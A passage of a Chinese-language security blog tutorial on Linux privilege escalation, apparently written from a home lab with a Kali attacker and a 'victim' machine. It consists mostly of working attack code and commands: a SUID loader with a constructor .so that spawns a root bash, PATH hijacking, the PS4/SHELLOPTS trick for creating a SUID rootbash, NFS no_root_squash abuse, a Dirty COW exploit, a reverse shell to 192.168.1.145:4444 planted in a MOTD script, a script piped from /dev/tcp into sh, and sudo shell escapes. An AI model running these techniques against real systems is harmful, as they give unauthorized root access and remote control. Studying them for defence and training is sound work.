<figure class="highlight c"><figcaption data-lang="c"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;dlfcn.h></span></span></pre></td></tr><tr><td data-num="4"></td><td><pre></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="6"></td><td><pre>    <span class="token comment">// 检查是否提供了正确数量的参数</span></pre></td></tr><tr><td data-num="7"></td><td><pre>    <span class="token keyword">if</span> <span class="token punctuation">(</span>argc <span class="token operator">!=</span> <span class="token number">2</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="8"></td><td><pre>        <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Usage: %s &lt;path to .so file>\n"</span><span class="token punctuation">,</span> argv<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="9"></td><td><pre>        <span class="token keyword">return</span> <span class="token number">1</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre>    <span class="token punctuation">&#125;</span></pre></td></tr><tr><td data-num="11"></td><td><pre></pre></td></tr><tr><td data-num="12"></td><td><pre>    <span class="token comment">// 使用 dlopen 函数加载共享库</span></pre></td></tr><tr><td data-num="13"></td><td><pre>    <span class="token comment">// RTLD_LAZY 表示在 dlopen 返回前，解析器不会解析库中的任何符号</span></pre></td></tr><tr><td data-num="14"></td><td><pre>    <span class="token comment">// 符号解析将推迟到第一次调用 dlsym 或者第一次访问这些符号时进行</span></pre></td></tr><tr><td data-num="15"></td><td><pre>    <span class="token keyword">void</span> <span class="token operator">*</span>handle <span class="token operator">=</span> <span class="token function">dlopen</span><span class="token punctuation">(</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">,</span> RTLD_LAZY<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="16"></td><td><pre>    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>handle<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="17"></td><td><pre>        <span class="token comment">// 如果 dlopen 返回 NULL，表示加载共享库失败</span></pre></td></tr><tr><td data-num="18"></td><td><pre>        <span class="token comment">// 此时可以使用 dlerror 函数获取错误信息</span></pre></td></tr><tr><td data-num="19"></td><td><pre>        <span class="token function">fprintf</span><span class="token punctuation">(</span><span class="token constant">stderr</span><span class="token punctuation">,</span> <span class="token string">"Error: %s\n"</span><span class="token punctuation">,</span> <span class="token function">dlerror</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="20"></td><td><pre>        <span class="token keyword">return</span> <span class="token number">1</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="21"></td><td><pre>    <span class="token punctuation">&#125;</span></pre></td></tr><tr><td data-num="22"></td><td><pre></pre></td></tr><tr><td data-num="23"></td><td><pre>    <span class="token comment">// 使用 dlclose 函数卸载共享库</span></pre></td></tr><tr><td data-num="24"></td><td><pre>    <span class="token comment">// 如果共享库不再需要，应该尽快卸载，以节省内存资源</span></pre></td></tr><tr><td data-num="25"></td><td><pre>    <span class="token function">dlclose</span><span class="token punctuation">(</span>handle<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="26"></td><td><pre>    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="27"></td><td><pre><span class="token punctuation">&#125;</span></pre></td></tr></table></figure><p>编译好给 s 权限</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tr><td data-num="1"></td><td><pre>gcc <span class="token parameter variable">-o</span> loader loader.c <span class="token parameter variable">-ldl</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">sudo</span> <span class="token function">chown</span> root:root loader</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">sudo</span> <span class="token function">chmod</span> u+s loader</pre></td></tr></table></figure><p>这段程序会接受我们传入的参数这个参数就是一个共享库 so 文件，因为这个文件是有 s 位权限的我们就可以写一个提权的 so 文件执行以后就会获取 root 权限的 shell</p>
<p>编写一个共享库文件里面是提权代码</p>
<figure class="highlight c"><figcaption data-lang="c"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span></pre></td></tr><tr><td data-num="4"></td><td><pre></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token comment">// 使用 attribute ((constructor)) 标记，使得这个函数在 main 函数执行前被调用</span></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">shell</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">__attribute__</span><span class="token punctuation">(</span><span class="token punctuation">(</span>constructor<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre></pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token keyword">void</span> <span class="token function">shell</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="9"></td><td><pre>    <span class="token comment">// 将当前进程的用户 ID 和组 ID 设置为 0（对应 root 用户）</span></pre></td></tr><tr><td data-num="10"></td><td><pre>    <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="11"></td><td><pre>    <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="12"></td><td><pre></pre></td></tr><tr><td data-num="13"></td><td><pre>    <span class="token comment">// 启动一个新的 bash shell</span></pre></td></tr><tr><td data-num="14"></td><td><pre>    <span class="token comment">//-p 选项会让 bash 保留特权，这意味着新启动的 shell 会以 root 权限运行</span></pre></td></tr><tr><td data-num="15"></td><td><pre>    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/bin/bash -p"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="16"></td><td><pre><span class="token punctuation">&#125;</span></pre></td></tr></table></figure><figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token comment">#编译成 so</span></pre></td></tr><tr><td data-num="2"></td><td><pre>gcc <span class="token parameter variable">-shared</span> <span class="token parameter variable">-fPIC</span> <span class="token parameter variable">-o</span> shell2.so shell2.c</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment">#生成一个名为 shell.so 的共享库文件。-shared 生成一个共享库，-fPIC 生成位置无关代码，</span></pre></td></tr></table></figure><p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240224223157195.png" alt="image-20240224223157195"></p>
<p>执行 /usr/local/bin/loader <span class="exturl" data-url="aHR0cDovL3NoZWxsLnNv">shell.so</span></p>
<p>当前权限</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240224225741050.png" alt="image-20240224225741050"></p>
<p>执行以后</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240224225907104.png" alt="image-20240224225907104"></p>
<p>原理：</p>
<p>漏洞点在于程序允许任何用户加载并执行任意的共享库。如果一个恶意用户能够控制被加载的共享库，那么他们就可以执行任意代码，并且由于程序设置了  <code>SUID</code>  位，这段代码将以文件所有者（在我们的例子中是 root 用户）的权限来执行。</p>
<p>例如，可以创建一个共享库，其中包含一个构造函数（在共享库被加载时自动执行的函数），这个构造函数执行一些恶意操作，如创建一个 root shell。然后可以通过程序来加载这个共享库。由于程序设置了  <code>SUID</code>  位，这个共享库将以 root 用户的权限来执行，因此就可以获得 root 权限。</p>
<h4 id="suid环境变量劫持提权"><a class="markdownIt-Anchor" href="#suid环境变量劫持提权">#</a> SUID 环境变量劫持提权</h4>
<figure class="highlight c"><figcaption data-lang="c"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/types.h></span></span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span></pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>    <span class="token comment">// 尝试执行 shell 程序</span></pre></td></tr><tr><td data-num="8"></td><td><pre>      <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="9"></td><td><pre>      <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre>    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"shell"</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="11"></td><td><pre>        <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"错误：没有找到shell\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="12"></td><td><pre>    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="13"></td><td><pre>        <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"shell程序已成功执行\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="14"></td><td><pre>    <span class="token punctuation">&#125;</span></pre></td></tr><tr><td data-num="15"></td><td><pre></pre></td></tr><tr><td data-num="16"></td><td><pre>    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="17"></td><td><pre><span class="token punctuation">&#125;</span></pre></td></tr></table></figure><p>因为它使用了 <code>system</code>  函数，而 <code>system</code>  函数会在用户的环境变量 <code>PATH</code>  中查找命令。因此，如果用户有权限修改自己的环境变量，就可以劫持 <code>shell</code>  文件写一个同名文件然后写入提权程序拿到 root</p>
<p>在 /home/kali/hc 创建一个 shell 程序</p>
<figure class="highlight c"><figcaption data-lang="c"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/types.h></span></span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span></pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>       <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="8"></td><td><pre>       <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="9"></td><td><pre>       <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/bin/bash -p"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre><span class="token punctuation">&#125;</span></pre></td></tr></table></figure><p>更改临时环境便变量让程序执行时首先查找 /home/kali/hc 目录下有没有 shell</p>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token builtin class-name">export</span> <span class="token assign-left variable"><span class="token environment constant">PATH</span></span><span class="token operator">=</span>/home/kali/hc:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/kali/hc</pre></td></tr></table></figure><p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240225152031452.png" alt="image-20240225152031452"></p>
<h4 id="suid-滥用shell功能提权"><a class="markdownIt-Anchor" href="#suid-滥用shell功能提权">#</a> SUID - 滥用 shell 功能提权</h4>
<p>查看 bash 版本在 bash 版本低于 4.4 的时候用</p>
<p><code>env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash)' /usr/local/bin/suid4</code>  进行提权</p>
<p>原理为：</p>
<p><code>env -i</code> ：这个命令用于运行一个程序，在一个新的、空的环境中。也就是说，它不会继承任何环境变量。</p>
<p><code>SHELLOPTS=xtrace</code> ：这个环境变量设置 Bash shell 进入追踪模式（xtrace），在这种模式下，Bash 会打印出执行的每一条命令。</p>
<p>然后用 PS4 配合 xtrace 提权 PS4 是一个环境变量这个环境变量设置了 Bash shell 在打印追踪信息时使用的提示符</p>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre>默认<span class="token environment constant">PS4</span><span class="token variable"><span class="token variable">`</span> 的值设置为 <span class="token variable">`</span></span><span class="token string">'+'</span></pre></td></tr><tr><td data-num="2"></td><td><pre>也就是我们打开xtrace模式打印出来的命令前面的+号</pre></td></tr><tr><td data-num="3"></td><td><pre>例如：</pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment">#!/bin/bash</span></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token assign-left variable"><span class="token environment constant">PS4</span></span><span class="token operator">=</span><span class="token string">'Line $&#123;LINENO&#125;: '</span></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token builtin class-name">set</span> <span class="token parameter variable">-x</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token builtin class-name">echo</span> <span class="token string">"Hello, world!"</span></pre></td></tr><tr><td data-num="8"></td><td><pre>运行这个脚本，你会看到：</pre></td></tr><tr><td data-num="9"></td><td><pre>Line <span class="token number">4</span>: <span class="token builtin class-name">echo</span> Hello, world<span class="token operator">!</span></pre></td></tr><tr><td data-num="10"></td><td><pre>Hello, world<span class="token operator">!</span></pre></td></tr></table></figure><p><code>PS4='$(cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash)'</code> ：我们把他替换为了 <code>'$(cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash)'</code>  这些命令复制  <code>/bin/bash</code>  到  <code>/tmp/rootbash</code> ，并给予新文件 SUID 权限。这意味着任何用户运行  <code>/tmp/rootbash</code>  时，都会以文件所有者（在这种情况下是 root）的权限来运行。</p>
<p><code>/usr/local/bin/suid4</code> ：这是要以新环境运行的程序。一个有 s 位的程序，由于  <code>SHELLOPTS</code>  和  <code>PS4</code>  的设置，它会在运行时执行  <code>PS4</code>  中的命令也就是复制出一个具有 root 权限的 bash shell 到 /tmp</p>
<p>然后我们运行 <code>rootbash -p</code>  即可获得 root 权限的 shell</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240225180540986.png" alt="image-20240225180540986"></p>
<p>可看到运行后生成了 rootbash 获取了 root</p>
<p>当然可以将  <code>PS4</code>  中的命令替换为任何有效的 Bash 命令。因为  <code>PS4</code>  变量的值会在每次打印追踪信息之前被执行。所以你可以在  <code>PS4</code>  中插入任何你想要在每次命令执行之前运行的代码。</p>
<h3 id="nsf提权"><a class="markdownIt-Anchor" href="#nsf提权">#</a> NSF 提权</h3>
<p>nsf 是 Linux 系统中用于共享文件和目录的功能通过 NFS，用户和程序可以访问远程系统上的文件，就像访问本地文件一样</p>
<p>nsf 的配置在 /etc/exports 文件中</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226133638600.png" alt="image-20240226133638600"></p>
<p>这行表示共享  <code>/tmp</code>  目录，所有的网络主机都可以访问（由  <code>*</code>  表示），有读写权限（由  <code>rw</code>  表示），共享将立即写入磁盘就是立即生效（由  <code>sync</code>  表示），  <code>insecure</code>  允许非保留端口连接 ，禁止 root 权限映射（由  <code>no_root_squash</code>  表示），并且不检查子目录的权限（由  <code>no_subtree_check</code>  表示）。</p>
<p>特别是有 no_root_squash 启用  <code>no_root_squash</code>  会使得 root 在 NFS 客户端上拥有和服务器上相同的权限</p>
<p>利用：</p>
<p>创建一个目录进行挂载</p>
<p><code>mkdir /home/kali/hc/nfs-shell</code></p>
<p><code>mount -o rw,vers=3 192.168.1.144:/tmp /home/kali/hc/nfs-shell</code></p>
<p>rw 读写权限，vers3 版本</p>
<p>成功挂载</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226142439658.png" alt="image-20240226142439658"></p>
<p>接下来写一个提权程序</p>
<p><code>vim shell.c</code></p>
<figure class="highlight c"><figcaption data-lang="c"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span></pre></td></tr><tr><td data-num="4"></td><td><pre></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="6"></td><td><pre>       <span class="token function">setgid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>       <span class="token function">setuid</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="8"></td><td><pre>       <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/bin/bash -p"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token punctuation">&#125;</span></pre></td></tr></table></figure><p>编译然后给 shell 执行权限</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226145826134.png" alt="image-20240226145826134"></p>
<p>回到受害机执行提权到 root</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226170226574.png" alt="image-20240226170226574"></p>
<h3 id="内核提权"><a class="markdownIt-Anchor" href="#内核提权">#</a> 内核提权</h3>
<p>查看内核版本 <code>uname -a</code></p>
<p><code>curl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh</code></p>
<p>下载 linpeas 脚本收集信息</p>
<p>如果没有 curl 可以用 kali 下载 nc 传过来</p>
<p><code>wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh</code></p>
<p>kali： <code>nc -lvnp 80 &lt; linpeas.sh</code></p>
<p>受害： <code>cat &lt; /dev/tcp/192.168.1.145/80 | sh</code></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226191302928.png" alt="image-20240226191302928"></p>
<h4 id="脏牛提权cve-2016-5195"><a class="markdownIt-Anchor" href="#脏牛提权cve-2016-5195">#</a> 脏牛提权 (CVE-2016-5195)</h4>
<p><code>searchsploit</code>  搜索脏牛</p>
<p>​	<img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226192506760.png" alt="image-20240226192506760"></p>
<p>有这些漏洞利用脚本下一个</p>
<p><code>searchsploit -m 40839.c</code></p>
<p>传到受害查看说明</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226192639018.png" alt="image-20240226192639018"></p>
<p>要用 - pthread 和 - lcrypt 编译编译好后执行然后输入新的密码就可以了</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226193427616.png" alt="image-20240226193427616"></p>
<h3 id="motd机制提权"><a class="markdownIt-Anchor" href="#motd机制提权">#</a> MOTD 机制提权</h3>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226195723017.png" alt="image-20240226195723017"></p>
<p><code>update-motd.d</code>  目录下的脚本在用户通过 SSH 登录时会被执行，用于生成登录后的欢迎信息这些脚本通常以 root 权限运行</p>
<p><code>00-header</code>  是  <code>update-motd.d</code>  目录下的一个脚本如果一个用户对  <code>00-header</code>  文件有写权限，那么他们就可以修改这个文件，插入一些恶意代码例如，他们可以添加一个修改 root 用户密码的命令或者反弹 shell 当其他用户通过 SSH 登录时， <code>00-header</code>  脚本会以 root 权限运行，执行其中的命令</p>
<p><code>vim </code> 输入 <code>bash -c &quot;bash -i &gt;&amp; /dev/tcp/192.168.1.145/4444 0&gt;&amp;1&quot;</code></p>
<p>kali 监听 <code>nc -lvnp 4444</code></p>
<p>再重新 ssh 登陆让他执行这个脚本，成功拿到 root</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240226200442064.png" alt="image-20240226200442064"></p>
<h3 id="sudo提权"><a class="markdownIt-Anchor" href="#sudo提权">#</a> sudo 提权</h3>
<h4 id="sudofind-提权"><a class="markdownIt-Anchor" href="#sudofind-提权">#</a> sudofind 提权</h4>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token function">sudo</span> <span class="token function">find</span> <span class="token builtin class-name">.</span> <span class="token parameter variable">-exec</span> /bin/sh <span class="token punctuation">\</span><span class="token punctuation">;</span> <span class="token parameter variable">-quit</span></pre></td></tr></table></figure><p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240301183010100.png" alt="image-20240301183010100"></p>
<h4 id="sudoapt提权"><a class="markdownIt-Anchor" href="#sudoapt提权">#</a> sudoapt 提权</h4>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token function">sudo</span> <span class="token function">apt</span> update <span class="token parameter variable">-o</span> APT::Update::Pre-Invoke::<span class="token operator">=</span>/bin/sh</pre></td></tr></table></figure><p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240301183347295.png" alt="image-20240301183347295"></p>
<h4 id="sudovim提权"><a class="markdownIt-Anchor" href="#sudovim提权">#</a> sudovim 提权</h4>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token function">sudo</span> <span class="token function">vim</span> <span class="token parameter variable">-c</span> <span class="token string">':!/bin/sh'</span></pre></td></tr></table></figure><p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240301193448209.png" alt="image-20240301193448209"></p>
<h3 id="gtfobins"><a class="markdownIt-Anchor" href="#gtfobins">#</a> GTFOBins</h3>
<p>这个网站可以搜索更多 sudo suid 提权</p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240301201128501.png" alt="image-20240301201128501"></p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/linux%E6%8F%90%E6%9D%83/image-20240301201241369.png" alt="image-20240301201241369"></p>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2024-03-04 15:10:12" itemprop="dateModified" datetime="2024-03-04T15:10:12+08:00">2024-03-04</time></span></div><div class="reward"><button><i class="ic i-heartbeat"></i>赞赏</button><p>请我喝[茶]~(￣▽￣)~*</p><div id="qr"><div><img data-src="/assets/wechatpay.png" alt="云逸 微信支付"/><p>微信支付</p></div><div><img data-src="/assets/alipay.png" alt="云逸 支付宝"/><p>支付宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>云逸<i class="ic i-at"><em>@</em></i>云逸'bolg</li><li class="link"><strong>本文链接：</strong><a href="http://gyzero.shop/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/" title="linux提权">http://gyzero.shop/2023/11/10/network-security/neiwang/linux提权/linux提权/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/" rel="prev" itemprop="url" data-background-image="https:&#x2F;&#x2F;tuchuang-1309689803.cos.ap-nanjing.myqcloud.com&#x2F;gyzero&#x2F;zzz.jpg" title="Windows提权"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>内网安全</span><h3>Windows提权</h3></a></div><div class="item right"><a href="/2023/11/12/network-security/neiwang/%E7%BB%95%E9%98%B2%E7%81%AB%E5%A2%99/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/" rel="next" itemprop="url" data-background-image="https:&#x2F;&#x2F;tuchuang-1309689803.cos.ap-nanjing.myqcloud.com&#x2F;gyzero&#x2F;zzz.jpg" title="端口转发"><span class="type">下一篇</span><h3>端口转发</h3></a></div></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E5%91%BD%E4%BB%A4"><span class="toc-number">1.</span> <span class="toc-text"> 信息收集命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E4%BF%A1%E6%81%AF"><span class="toc-number">1.1.</span> <span class="toc-text"> 系统信息</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E4%BF%A1%E6%81%AF"><span class="toc-number">1.2.</span> <span class="toc-text"> 网络信息</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%A8%E6%88%B7%E7%BB%84%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1"><span class="toc-number">1.3.</span> <span class="toc-text"> 用户组信息系统服务</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.4.</span> <span class="toc-text"> 信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell"><span 